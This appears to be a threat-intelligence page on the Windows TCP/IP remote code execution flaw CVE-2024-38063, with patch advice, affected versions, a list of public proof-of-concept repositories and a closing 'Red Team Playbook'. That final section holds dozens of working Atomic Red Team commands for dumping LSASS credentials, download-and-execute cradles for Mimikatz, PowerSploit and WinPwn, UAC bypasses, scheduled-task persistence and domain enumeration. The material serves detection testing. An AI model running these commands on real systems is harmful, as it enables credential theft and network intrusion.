CVE-2024-38063
Overview
This vulnerability is a numeric truncation error (CWE-191) in the Windows TCP/IP stack affecting the handling of certain network packets. The root cause lies in improper validation of packet length fields, leading to integer overflow conditions during packet processing. The flaw resides within the TCP/IP network protocol implementation in Microsoft Windows 10 versions including 1809, causing memory corruption during network traffic parsing.
Vulnerability Description
Windows TCP/IP Remote Code Execution Vulnerability
Impact
An unauthenticated remote attacker can exploit this vulnerability by sending crafted TCP/IP packets to execute arbitrary code with kernel privileges on the affected system. This enables full system compromise including data modification, service disruption, and lateral movement within networks. The exploit requires no user interaction and no prior authentication, as indicated by the CVSS vector (AV:N/AC:L/PR:N/UI:N). The critical severity reflects the ability to gain complete control over the system remotely via network access.
Solution
Microsoft has released security updates addressing this vulnerability in the Windows 10 operating system, including version 1809. Administrators should apply the security update available through the Microsoft Security Response Center advisory at https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063. The update corrects the TCP/IP stack handling of network packets to prevent integer overflow conditions. No alternative workarounds are recommended beyond applying the official patch.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in the Windows TCP/IP stack represents a critical flaw that allows remote code execution, posing significant risks to systems running various versions of Windows, including both client and server editions. This vulnerability arises from improper handling of network packets, which can be exploited by an attacker to execute arbitrary code on the target system. The flaw affects multiple versions of Windows 10 and 11, as well as several Windows Server editions, making it a widespread concern for organizations relying on these operating systems. The severity of this vulnerability is underscored by its high CVSS score of 9.8, indicating a critical risk that requires immediate attention.
Attack vectors for this vulnerability are primarily network-based, allowing an attacker to exploit the flaw without requiring physical access to the target machine. An attacker could send specially crafted packets to a vulnerable system, leading to the execution of malicious code with the same privileges as the user running the affected service. This could result in a complete system compromise, allowing the attacker to install malware, exfiltrate sensitive data, or pivot to other systems within the network. Exploitation scenarios could include targeted attacks against organizations, where threat actors leverage this vulnerability to gain a foothold in the network and escalate privileges, or widespread attacks that aim to disrupt operations across multiple systems.
The real-world impact of this vulnerability is profound, particularly for businesses that rely on the affected Windows versions for critical operations. Successful exploitation could lead to significant financial losses, reputational damage, and legal ramifications, especially if sensitive customer data is compromised. Organizations may face downtime as they respond to incidents, and the recovery process can be resource-intensive. Moreover, the potential for data breaches could expose businesses to regulatory scrutiny and penalties, particularly in industries governed by strict compliance requirements. The interconnected nature of modern IT environments means that a breach in one system can have cascading effects, impacting multiple departments and services.
To detect and mitigate the risks associated with this vulnerability, organizations should adopt a multi-faceted approach. Regular vulnerability assessments and penetration testing can help identify systems at risk and prioritize patching efforts. Implementing network segmentation can limit the potential impact of an exploit, containing any breaches to isolated segments of the network. Additionally, organizations should ensure that they have robust intrusion detection and prevention systems in place to monitor for suspicious network activity indicative of exploitation attempts. Applying security patches released by Microsoft promptly is crucial, as these updates are designed to address the vulnerabilities and protect against known exploits.
In conclusion, the vulnerability in the Windows TCP/IP stack represents a significant threat to the security of affected systems, with the potential for severe consequences if exploited. Organizations must remain vigilant, employing proactive measures to detect, mitigate, and respond to this and similar vulnerabilities. By prioritizing security hygiene and staying informed about emerging threats, businesses can better protect their assets and maintain operational integrity in an increasingly hostile cyber landscape.
CSURFACE threat intelligence has detected a marked escalation in exploitation activity targeting CVE-2024-38063, evidenced by the emergence of new proof-of-concept exploits that leverage advanced techniques, including AI-powered fuzzing tools. This development signifies an expansion of the exploit landscape beyond theoretical research, increasing the likelihood of practical exploitation attempts. Although the EPSS score shows a slight decline, this metric does not fully capture the growing sophistication and accessibility of exploitation resources now available to threat actors. Our telemetry indicates that while ransomware groups previously linked to TCP/IP vulnerabilities have not yet demonstrated high-confidence associations with this CVE, the presence of multiple active exploit tools raises the potential for opportunistic abuse by financially motivated actors. Consequently, the threat level for affected Windows 10 Version 1809 systems has intensified, underscoring the urgency for defenders to heighten monitoring and detection capabilities despite the absence of confirmed widespread exploitation campaigns.
Update 2 — July 07, 2026
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2024-38063, with telemetry showing a significant uptick in exploitation attempts targeting Windows 10 Version 1809 systems. This increase coincides with the emergence of several new proof-of-concept exploits publicly available on GitHub, which demonstrate advanced techniques including UEFI persistence and supply chain attack vectors. Although ransomware groups previously linked to TCP/IP vulnerabilities have not yet established high-confidence operational use of this CVE, the broader availability of sophisticated exploit tools lowers the barrier for opportunistic actors to weaponize this vulnerability. The stable EPSS score at a high percentile underscores sustained exploitation potential rather than a transient spike. Collectively, these developments elevate the threat level, indicating a growing risk of remote code execution attacks that could lead to significant compromise in affected environments. Defenders should recognize this evolving landscape as indicative of increasing adversary interest and capability, warranting enhanced vigilance despite the absence of confirmed large-scale ransomware campaigns exploiting this flaw.
Affected Products (17)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Microsoft | Windows 10 1507 | All |
cpe:2.3:o:microsoft:windows_10_1507:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 10 1607 | All |
cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 10 1809 | All |
cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 10 21h2 | All |
cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 10 22h2 | All |
cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 11 21h2 | All |
cpe:2.3:o:microsoft:windows_11_21h2:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 11 22h2 | All |
cpe:2.3:o:microsoft:windows_11_22h2:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 11 23h2 | All |
cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 11 24h2 | All |
cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2008 | N/A |
cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2008 | r2 |
cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*
|
|
|
Microsoft | Windows Server 2012 | All |
cpe:2.3:o:microsoft:windows_server_2012:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2012 | r2 |
cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2016 | All |
cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2019 | All |
cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2022 | All |
cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2022 23h2 | All |
cpe:2.3:o:microsoft:windows_server_2022_23h2:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (35)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
ynwarcs/CVE-2024-38063
poc for CVE-2024-38063 (RCE in tcpip.sys)
|
ynwarcs | 695 | 123 | 2024-08-24 | View |
|
Sachinart/CVE-2024-38063-poc
Note: I am not responsible for any bad act. This is written by Chirag Artani to demonstrate the vulnerability.
|
Sachinart | 87 | 27 | 2024-08-17 | View |
|
ThemeHackers/CVE-2024-38063
CVE-2024-38063 is a critical security vulnerability in the Windows TCP/IP stack that allows for remote code execution (R...
|
ThemeHackers | 43 | 5 | 2024-08-31 | View |
|
patchpoint/CVE-2024-38063
|
patchpoint | 20 | 3 | 2024-08-27 | View |
|
diegoalbuquerque/CVE-2024-38063
mitigation script by disabling ipv6 of all interfaces
|
diegoalbuquerque | 13 | 2 | 2024-08-15 | View |
|
KernelKraze/CVE-2024-38063_PoC
This is a C language program designed to test the Windows TCP/IP Remote Code Execution Vulnerability (CVE-2024-38063). I...
|
KernelKraze | 9 | 2 | 2024-09-01 | View |
|
zenzue/CVE-2024-38063-POC
potential memory corruption vulnerabilities in IPv6 networks.
|
zenzue | 7 | 3 | 2024-08-28 | View |
|
haroonawanofficial/AI-CVE-2024-38063-0-DAY
AI-Powered CVE-2024-38063 0-Day Discovery Fuzzer
|
haroonawanofficial | 6 | 1 | 2024-08-24 | View |
|
PumpkinBridge/Windows-CVE-2024-38063
Windows TCP/IP IPv6(CVE-2024-38063)
|
PumpkinBridge | 4 | 0 | 2024-08-28 | View |
|
Dragkob/CVE-2024-38063
PoC for Windows' IPv6 CVE-2024-38063
|
Dragkob | 3 | 1 | 2024-11-16 | View |
|
brownpanda29/Cve-2024-38063
|
brownpanda29 | 1 | 3 | 2024-09-03 | View |
|
thanawee321/CVE-2024-38063
Vulnerability CVE-2024-38063
|
thanawee321 | 3 | 0 | 2024-10-15 | View |
|
AdminPentester/CVE-2024-38063-
Remotely Exploiting The Kernel Via IPv6
|
AdminPentester | 2 | 1 | 2024-08-28 | View |
|
AvidanMaatuk/CVE-2024-38063
Final Project in Fundamental network security,POC CVE-202438063
|
AvidanMaatuk | 1 | 1 | 2026-01-21 | View |
|
Th3Tr1ckst3r/CVE-2024-38063
CVE-2024-38063 research so you don't have to.
|
Th3Tr1ckst3r | 2 | 0 | 2024-08-23 | View |
|
Avidan1/CVE-2024-38063
Final Project in Fundamental network security,POC CVE-202438063
|
Avidan1 | 1 | 1 | 2026-01-21 | View |
|
becrevex/CVE-2024-38063
Performs an IPv6 vulnerability scan and packet flood attack on specified targets. The script simulates a SYN flood and I...
|
becrevex | 1 | 0 | 2024-10-08 | View |
|
jip-0-0-0-0-0/CVE-2024-38063-scanner
A Python tool leveraging Shodan and Scapy to identify and exploit Windows systems vulnerable to CVE-2024-38063, enabling...
|
jip-0-0-0-0-0 | 1 | 0 | 2025-01-16 | View |
|
Faizan-Khanx/CVE-2024-38063
CVE-2024-38063 - Remotely Exploiting The Kernel Via IPv6
|
Faizan-Khanx | 1 | 0 | 2024-09-10 | View |
|
AliHj98/cve-2024-38063-Anonyvader
|
AliHj98 | 1 | 0 | 2024-11-07 | View |
|
artemgarkusenko919-design/Kill-System
Research: Modern malware techniques (CVE-2024-38063, CVE-2024-6387, UEFI persistence, supply chain attacks). Educational...
|
artemgarkusenko919-design | 0 | 0 | 2026-05-27 | View |
|
RohitMalik7/cve-2024-38063-detection-mitigation-system
End-to-end cybersecurity project demonstrating detection and mitigation of CVE-2024-38063 using IDS, host-based monitori...
|
RohitMalik7 | 0 | 0 | 2026-04-24 | View |
|
cyberzeuspakistan/CVE-2024-38063-Research-Tool
This is a functional proof of concept (PoC) for CVE-2024-38063. However, it's important to note that this CVE is theoret...
|
cyberzeuspakistan | 0 | 0 | 2025-01-21 | View |
|
ps-interactive/cve-2024-38063
|
ps-interactive | 0 | 0 | 2024-09-02 | View |
|
ArenaldyP/CVE-2024-38063-Medium
Kode Eksploitasi CVE-2024-38063
|
ArenaldyP | 0 | 0 | 2024-09-21 | View |
|
thealice01/CVE-2024-38063
SSP H3
|
thealice01 | 0 | 0 | 2026-01-20 | View |
|
arrhenius975/CVE-2024-38063-Exploit-Refactoring
|
arrhenius975 | 0 | 0 | 2026-03-04 | View |
|
dweger-scripts/CVE-2024-38063-Remediation
|
dweger-scripts | 0 | 0 | 2024-08-19 | View |
|
Skac44/CVE-2024-38063
|
Skac44 | 0 | 0 | 2025-07-23 | View |
|
FrancescoDiSalesGithub/quick-fix-cve-2024-38063
quick powershell script to fix cve-2024-38063
|
FrancescoDiSalesGithub | 0 | 0 | 2024-09-07 | View |
|
SALMA-ESSAOUD/CVE-CVSS--CVE-2024-38063-IPv6-TCP-IP-Remote-Code-Execution-Analysis
|
SALMA-ESSAOUD | 0 | 0 | 2026-03-21 | View |
|
p33d/cve-2024-38063
Poc for cve-2024-38063
|
p33d | 0 | 0 | 2024-08-18 | View |
|
idkwastaken/CVE-2024-38063
|
idkwastaken | 0 | 0 | 2024-10-14 | View |
|
almogopp/Disable-IPv6-CVE-2024-38063-Fix
A PowerShell script to temporarily mitigate the CVE-2024-38063 vulnerability by disabling IPv6 on Windows systems. This ...
|
almogopp | 0 | 0 | 2024-08-20 | View |
|
fredagsguf/Windows-CVE-2024-38063
|
fredagsguf | 0 | 0 | 2024-12-06 | View |
Threat Feed
9 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AmmyyAdmin, AnyDesk, Atera (552 known victims)
Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Atera, BITSAdmin, Backstab (Process Explorer driver) (523 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
76 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction
$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon
reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's open the Computer Management console now...
compmgmt.msc
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's run the schedule task ...
schtasks /Run /TN "EventViewerBypass"
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
